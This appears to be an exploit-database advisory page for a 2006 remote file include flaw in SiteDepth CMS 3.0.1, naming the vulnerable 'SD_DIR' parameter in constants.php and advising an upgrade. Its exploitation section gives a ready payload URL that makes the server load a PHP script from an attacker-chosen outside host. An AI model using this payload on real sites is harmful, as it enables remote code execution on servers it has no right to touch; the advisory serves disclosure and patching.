header-logo
Suggest Exploit
vendor:
SiteDepth CMS
by:
Aesthetico
7,5
CVSS
HIGH
Remote File Include
94
CWE
Product Name: SiteDepth CMS
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: YES
Related CWE: CVE-2006-3730
CPE: a:sitedepth:sitedepth_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability

SiteDepth CMS version 3.0.1 and prior are prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'SD_DIR' parameter in the 'constants.php' script. An attacker can exploit this issue to execute arbitrary remote PHP code on the affected computer with the privileges of the webserver process.

Mitigation:

Upgrade to SiteDepth CMS version 3.0.2 or later.
Source

Exploit-DB raw data:

Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------

Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-07-20]